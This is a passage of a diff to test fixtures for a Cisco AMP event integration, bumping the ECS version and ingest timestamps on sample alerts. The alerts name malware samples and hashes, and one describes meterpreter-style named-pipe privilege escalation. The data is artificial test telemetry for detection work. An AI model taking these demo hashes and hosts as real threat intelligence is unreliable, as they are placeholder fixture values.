Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:ZVETJ.18gs.1201\",\"detection_id\":\"6180351977805840385\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"wsymqyv90.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\OUTLOOK_TEMP\\\\wsymqyv90.exe\",\"identity\":{\"sha256\":\"b630e72639cc7340620adb0cfc26332ec52fe8867b769695f2d25718d68b1b40\",\"sha1\":\"70aef829bec17195e6c8ec0e6cba0ed39f97ba48\",\"md5\":\"e2f5dcd966e26d54329e8d79c7201652\"},\"parent\":{\"process_id\":4040,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -368,7 +368,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -394,7 +394,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469620841Z", + "ingested": "2021-09-13T18:06:41.546091935Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159258594551267000,\"timestamp\":1610707507,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-15T10:45:07+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159258594551267599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"iodnxvg.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\iodnxvg.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -481,7 +481,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -507,7 +507,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469622790Z", + "ingested": "2021-09-13T18:06:41.546093998Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55810,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -591,7 +591,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -617,7 +617,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469624731Z", + "ingested": "2021-09-13T18:06:41.546096107Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":978000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55805,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -701,7 +701,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -727,7 +727,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469626640Z", + "ingested": "2021-09-13T18:06:41.546098190Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55809,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -811,7 +811,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -837,7 +837,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469628547Z", + "ingested": "2021-09-13T18:06:41.546100246Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":931000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55808,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -921,7 +921,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -947,7 +947,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469630455Z", + "ingested": "2021-09-13T18:06:41.546102333Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":900000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55807,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -1031,7 +1031,7 @@ }, "@timestamp": "2021-01-15T10:37:43.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1057,7 +1057,7 @@ "event": { "severity": 3, "action": "DFC Threat Detected", - "ingested": "2021-09-12T17:31:04.469632385Z", + "ingested": "2021-09-13T18:06:41.546104374Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180341055704007000,\"timestamp\":1610707063,\"timestamp_nanoseconds\":869000000,\"date\":\"2021-01-15T10:37:43+00:00\",\"event_type\":\"DFC Threat Detected\",\"event_type_id\":1090519084,\"detection\":\"DFC.CustomIPList\",\"detection_id\":\"6180341055704006658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"network_info\":{\"remote_ip\":\"8.8.4.4\",\"remote_port\":443,\"local_ip\":\"10.10.0.0\",\"local_port\":55806,\"nfm\":{\"direction\":\"Outgoing connection from\",\"protocol\":\"TCP\"},\"parent\":{\"process_id\":3136,\"disposition\":\"Clean\",\"file_name\":\"iexplore.exe\",\"identity\":{\"sha256\":\"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132\",\"sha1\":\"8de30174cebc8732f1ba961e7d93fe5549495a80\",\"md5\":\"b3581f426dc500a51091cdd5bacf0454\"}}}}}", "id": "6180341055704007000", "kind": "alert" @@ -1114,7 +1114,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1134,7 +1134,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469634316Z", + "ingested": "2021-09-13T18:06:41.546106398Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1476910664322001000,\"timestamp\":1610706778,\"timestamp_nanoseconds\":322000000,\"date\":\"2021-01-15T10:32:58+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706778,\"start_date\":\"2021-01-15T10:32:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Meterpreter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"27:85:29:21:67:49\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\\\System.\",\"short_description\":\"W32.PossibleNamedPipeImpersonation.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/WINDOWS/system32/cmd.exe\",\"identity\":{\"sha256\":\"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9\"}}}}}", "kind": "alert", "start": "2021-01-15T10:32:58.000Z", @@ -1197,7 +1197,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1229,7 +1229,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469636399Z", + "ingested": "2021-09-13T18:06:41.546108632Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533671385032557000,\"timestamp\":1610706459,\"timestamp_nanoseconds\":25000000,\"date\":\"2021-01-15T10:27:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533671385032556606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1287,7 +1287,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1307,7 +1307,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469638309Z", + "ingested": "2021-09-13T18:06:41.546110725Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900329000200,\"timestamp\":1610706298,\"timestamp_nanoseconds\":329000000,\"date\":\"2021-01-15T10:24:58+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706298,\"start_date\":\"2021-01-15T10:24:58+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "kind": "alert", "start": "2021-01-15T10:24:58.000Z", @@ -1367,7 +1367,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1399,7 +1399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469640203Z", + "ingested": "2021-09-13T18:06:41.546112777Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":947000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1456,7 +1456,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1484,7 +1484,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469642099Z", + "ingested": "2021-09-13T18:06:41.546114815Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1541,7 +1541,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -1569,7 +1569,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469643984Z", + "ingested": "2021-09-13T18:06:41.546116850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -1629,7 +1629,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -1649,7 +1649,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469646010Z", + "ingested": "2021-09-13T18:06:41.546119034Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed 